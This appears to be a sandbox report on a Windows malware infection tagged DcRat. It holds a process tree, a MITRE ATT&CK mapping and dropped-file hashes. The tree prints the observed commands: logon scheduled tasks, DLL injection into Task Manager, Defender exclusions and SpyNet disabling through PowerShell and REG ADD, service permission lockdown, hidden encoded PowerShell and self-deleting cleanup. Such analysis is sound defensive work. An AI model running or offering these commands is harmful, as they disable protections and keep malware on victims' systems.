C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
PID:1360
-
C:\Windows\system32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:884
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:572
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
PID:2924
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v6⤵
- Modifies boot configuration data using bcdedit
PID:1944
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
PID:960
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
PID:2460 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:1540
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
C:\Users\Admin\Pictures\LyBen0R1Ao7idDzHyT9c1Fzu.exe"C:\Users\Admin\Pictures\LyBen0R1Ao7idDzHyT9c1Fzu.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1876 -
C:\Users\Admin\AppData\Local\Temp\is-C2HDQ.tmp\LyBen0R1Ao7idDzHyT9c1Fzu.tmp"C:\Users\Admin\AppData\Local\Temp\is-C2HDQ.tmp\LyBen0R1Ao7idDzHyT9c1Fzu.tmp" /SL5="$301AC,1871625,54272,C:\Users\Admin\Pictures\LyBen0R1Ao7idDzHyT9c1Fzu.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2336
-
C:\Users\Admin\Pictures\pWBGIfEREWc5oWoEmV5UenVZ.exe"C:\Users\Admin\Pictures\pWBGIfEREWc5oWoEmV5UenVZ.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1992 -
C:\Users\Admin\AppData\Local\Temp\syncUpd.exeC:\Users\Admin\AppData\Local\Temp\syncUpd.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:1836 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\GIJECGDGCB.exe"5⤵
- Loads dropped DLL
PID:2880 -
C:\Users\Admin\AppData\Local\Temp\GIJECGDGCB.exe"C:\Users\Admin\AppData\Local\Temp\GIJECGDGCB.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:2472 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\GIJECGDGCB.exe7⤵PID:784
-
C:\Windows\SysWOW64\PING.EXEping 2.2.2.2 -n 1 -w 30008⤵
- Runs ping.exe
PID:2460
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\GCBGCGHDGI.exe"5⤵PID:1584
-
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exeC:\Users\Admin\AppData\Local\Temp\BroomSetup.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1636 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "5⤵PID:1140
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵PID:2924
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F6⤵
- DcRat
- Creates scheduled task(s)
PID:2708
-
C:\Users\Admin\Pictures\XbHzqb0as03VeT1jmorU5VXk.exe"C:\Users\Admin\Pictures\XbHzqb0as03VeT1jmorU5VXk.exe"3⤵
- Executes dropped EXE
PID:1008 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵PID:2996
-
C:\Users\Admin\Pictures\SIiXbH2AtpQ6J1Xgu1diXRQ5.exe"C:\Users\Admin\Pictures\SIiXbH2AtpQ6J1Xgu1diXRQ5.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2928 -
C:\Users\Admin\AppData\Local\Temp\wfplwfs.exeC:\Users\Admin\AppData\Local\Temp\wfplwfs.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
PID:2256 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe5⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2796
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\Pictures\SIiXbH2AtpQ6J1Xgu1diXRQ5.exe"4⤵PID:2080
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 35⤵
- Runs ping.exe
PID:2416
-
C:\Users\Admin\Pictures\Qg3s6nUq4KhkqbjIvrPmo7HO.exe"C:\Users\Admin\Pictures\Qg3s6nUq4KhkqbjIvrPmo7HO.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1784 -
C:\Users\Admin\AppData\Local\Temp\7zSED5B.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:500 -
C:\Users\Admin\AppData\Local\Temp\7zSFD52.tmp\Install.exe.\Install.exe /EdidNuqZ "385118" /S5⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
PID:1764 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵PID:2652
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵PID:2580
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵PID:2836
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵PID:1768
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵PID:596
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵PID:3012
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵PID:1340
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵PID:1548
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gbiXhMefH" /SC once /ST 10:32:31 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- DcRat
- Creates scheduled task(s)
PID:2948
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gbiXhMefH"6⤵PID:2188
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gbiXhMefH"6⤵PID:2668
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bVJltUxuNruTzSXcXP" /SC once /ST 22:49:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\IglwyGcTzHYQuBNYW\xDQuDuBWcbEpSRL\nJffibd.exe\" Cu /Lssite_idHPQ 385118 /S" /V1 /F6⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1680
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2480 -s 9242⤵
- Loads dropped DLL
PID:2260
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Modifies Installed Components in the registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:820
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240316224738.log C:\Windows\Logs\CBS\CbsPersist_20240316224738.cab1⤵
- Drops file in Windows directory
PID:1924
-
C:\Windows\system32\taskeng.exetaskeng.exe {18BA8B26-9EE9-4E87-A763-92B11D69D8A1} S-1-5-21-2248906074-2862704502-246302768-1000:GHPZRGFC\Admin:Interactive:[1]1⤵PID:2080
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2536 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1052
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3060
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
PID:484
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution 2
Registry Run Keys / Startup Folder 2
Create or Modify System Process 1
Windows Service 1
Scheduled Task/Job 1
Privilege Escalation
Abuse Elevation Control Mechanism 1
Bypass User Account Control 1
Boot or Logon Autostart Execution 2
Registry Run Keys / Startup Folder 2
Create or Modify System Process 1
Windows Service 1
Scheduled Task/Job 1
Defense Evasion
Abuse Elevation Control Mechanism 1
Bypass User Account Control 1
File and Directory Permissions Modification 1
Impair Defenses 4
Disable or Modify System Firewall 1
Disable or Modify Tools 3
Modify Registry 8
Subvert Trust Controls 1
Install Root Certificate 1
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD59f9c0c16a7e5ff1d2185415e3a3be1f5
SHA162d0cb5a113e8f7fc1dc45ffd97c220392cc945a
SHA256b53c8b91e9ad700eb9d194308013baa0eb11cddfd9446c632fc06ba9bb956583
SHA512f4ad40316b8b31fc5e917b0bbff5c5d5e40829a1f12c237c41ec7dd8305f5c20da7b3e7056fbed94f325d8e95cc626636503787dda72e251ea4d91b042f9db75
-
Filesize
67KB
MD5753df6889fd7410a2e9fe333da83a429
SHA13c425f16e8267186061dd48ac1c77c122962456e
SHA256b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA5129d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize724B
MD58202a1cd02e7d69597995cabbe881a12
SHA18858d9d934b7aa9330ee73de6c476acf19929ff6
SHA25658f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA51297ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9
-
Filesize
1KB
MD5a266bb7dcc38a562631361bbf61dd11b
SHA13b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e